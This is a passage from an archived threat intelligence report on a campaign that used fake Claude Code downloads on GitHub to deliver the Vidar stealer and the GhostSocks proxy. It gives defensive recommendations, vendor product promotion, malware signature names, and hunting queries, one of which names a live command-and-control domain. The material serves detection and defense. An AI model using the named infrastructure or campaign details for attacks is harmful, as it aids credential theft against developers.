and\r\nControl\r\nProxy: Multi-hop Proxy T1090.003 GhostSocks SOCKS5 proxy\r\nExfiltration Exfiltration Over C2 Channel T1041 Data sent to Vidar C2\r\nTable 9. TTPs used in the campaign\r\nSecurity recommendations\r\nOrganizations can reduce the risk from this campaign by tightening controls around tool installation, validating\r\nsoftware sources, and actively monitoring for malicious activity using the following measures.\r\nInstruct developers to use verified sources only. Legitimate Claude Code is available only through official\r\nchannels such as claude.ai/install.sh (macOS/Linux) or claude.ai/install.ps1 (Windows), and via\r\nHomebrew, WinGet, or the VS Code/JetBrains extensions. npm-based installation has been deprecatedopen\r\non a new tab. Unofficial GitHub repositories offering precompiled or standalone installers should be\r\ntreated as potentially malicious.\r\nTreat GitHub Releases with scrutiny. The campaign abuses GitHub Releases as a trusted delivery\r\nmechanism. Large 7z archives (78–167 MB) hosted on newly created repositories with minimal commit\r\nhistory are a strong signal of abuse.\r\nBlock known infrastructure. Add the C\u0026C domains and IPs listed in the IOC section to network blocklists.\r\nMonitor for infostealer indicators. Watch for credential dumping patterns, connections to Steam\r\nCommunity profiles and Telegram channels used as dead drop resolvers, and unusual SOCKS5 proxy\r\nactivity.\r\nAudit AI tool installations. Establish clear organizational policies for which AI coding tools are approved\r\nand how they should be installed. Maintain an allowlist of approved sources.\r\nEnforce endpoint detection. Ensure endpoints have detections for Vidar stealer variants and Rust-compiled\r\ndroppers. The malware's anti-sandbox behavior means static detection rules are especially important.\r\nConclusion: Governance is the control plane for agentic risk\r\nThis Claude Code leak incident demonstrates that security compromise is not limited to software vulnerabilities; it\r\nis frequently enabled by weaknesses in people and organizational processes, which often drive the highest impact.\r\nIn practice, threat actors did not need a zero-day in the leaked codebase: they leveraged attention, trust signals,\r\nand predictable user behavior to achieve execution and credential theft.\r\nThis pattern becomes more consequential as organizations adopt agentic AI. Agentic systems can plan, reason, and\r\nact across enterprise environments, invoking tools, accessing data, and triggering workflows. Because these\r\nhttps://www.trendmicro.com/en_us/research/26/d/weaponizing-trust-claude-code-lures-and-github-release-payloads.html\r\nPage 18 of 21\n\nsystems operate through iterative, adaptive loops rather than fully deterministic execution paths, the outcomes can\r\nbe difficult to predict, trace, or control.\r\nAccordingly, TrendAI™ is designing solutions as an Agents Governance Gatewaynews- cybercrime-and-digital-threats, positioning governance as the control plane, rather than treating the problem as security alone. The\r\nobjective is to give organizations the ability to discover and inventory agents, observe what they are doing,\r\nunderstand behavior and intent across tool and data interactions, detect unsafe or anomalous actions, and enforce\r\npolicy so that autonomous capability can be adopted with measurable control and accountability.\r\nProactive security with TrendAI Vision One™\r\nTrendAI Vision One™one-platform is the industry-leading AI cybersecurity platform that centralizes cyber risk\r\nexposure management, security operations, and robust layered protection.\r\nUtilizing Observed Attack Techniques (OAT)\r\nTrendAI Vision One™ customers that use endpoint and server protection solutions may go into the Observed\r\nAttack Techniques section of the TrendAI Vision One™ console to look for suspicious activity that may indicate\r\nthe detection of malicious behavior associated with this threat.\r\nPotential indicators include:\r\nExecution of Claude with Leaked Version\r\nPossible Claude Code Related File Download\r\nAWS Claude Leak UserAgent\r\nPatterns, models, and signatures\r\nhttps://www.trendmicro.com/en_us/research/26/d/weaponizing-trust-claude-code-lures-and-github-release-payloads.html\r\nPage 19 of 21\n\nTrendAI Vision One™ solutions that utilize different pattern, behavior monitoring and other advanced detection\r\ntechnology can also detect and protect against the following known malicious components associated with in the\r\nwild exploits:\r\nTrojanSpy.Win64.VIDAR.SMCLX  (Smart Scan Agent Pattern 20.863)\r\nTrojan.Win64.VIDAR.CLX  (Smart Scan Agent Pattern 20.863)\r\nTrendAI Vision One™ Web Reputation Services (WRS)\r\nTrendAI Vision One™ is also blocking several known C\u0026C servers and Disease Vector IPs and domains known to\r\nbe associated with these exploits. Aside from that, verified malicious GitHub repositories and leak code download\r\nleaks are blocked as Illegal or Prohibited Content.\r\nTrendAI Vision One™ Threat Intelligence Hub\r\nTrendAI Vision One™ Threat Intelligence Hubproducts provides the latest insights on emerging threats and threat\r\nactors, exclusive strategic reports from TrendAI™ Research, and TrendAI Vision One™ Threat Intelligence Feed\r\nin the TrendAI Vision One™ platform.\r\nEmerging Threats: Claude Code Leak Social Engineering and Malware Distribution via GitHubopen on a new tab\r\nTrendAI Vision One™ Intelligence Reports (IOC Sweeping) \r\nClaude Code Leak Social Engineering and Malware Distribution via GitHubopen on a new tab\r\nHunting Queries \r\nTrendAI Vision One™ Search App\r\nTrendAI Vision One™ customers can use the Search App to match or hunt the malicious indicators mentioned in\r\nthis blog post with data in their environment.    \r\nDetects VIDAR and GHOSTSOCKS malware\r\nhttps://www.trendmicro.com/en_us/research/26/d/weaponizing-trust-claude-code-lures-and-github-release-payloads.html\r\nPage 20 of 21\n\nmalName: *VIDAR* OR *GHOSTSOCKS* and eventName: MALWARE_DETECTION\r\nDetects VIDAR connection to C\u0026C server\r\neventSubId:204 AND dst:(\"rti.cargomanbd.com\")\r\nMore hunting queries are available for TrendAI Vision One™ with Threat Intelligence Hub entitlement enabled. \r\nIndicators of Compromise (IOCs)\r\nIOCs related to this campaign can be found here.\r\nSource: https://www.trendmicro.com/en_us/research/26/d/weaponizing-trust-claude-code-lures-and-github-release-payloads.html\r\nhttps://www.trendmicro.com/en_us/research/26/d/weaponizing-trust-claude-code-lures-and-github-release-payloads.html\r\nPage 21 of 21",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.trendmicro.com/en_us/research/26/d/weaponizing-trust-claude-code-lures-and-github-release-payloads.html"
	],
	"report_names": [
		"weaponizing-trust-claude-code-lures-and-github-release-payloads.html"
	],
	"threat_actors": [],
	"ts_created_at": 1778032937,
	"ts_updated_at": 1778033032,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/7c2d866aac3a558ae228733c723c48da8260718c.pdf",
		"text": "https://archive.orkl.eu/7c2d866aac3a558ae228733c723c48da8260718c.txt",
		"img": "https://archive.orkl.eu/7c2d866aac3a558ae228733c723c48da8260718c.jpg"
	}
}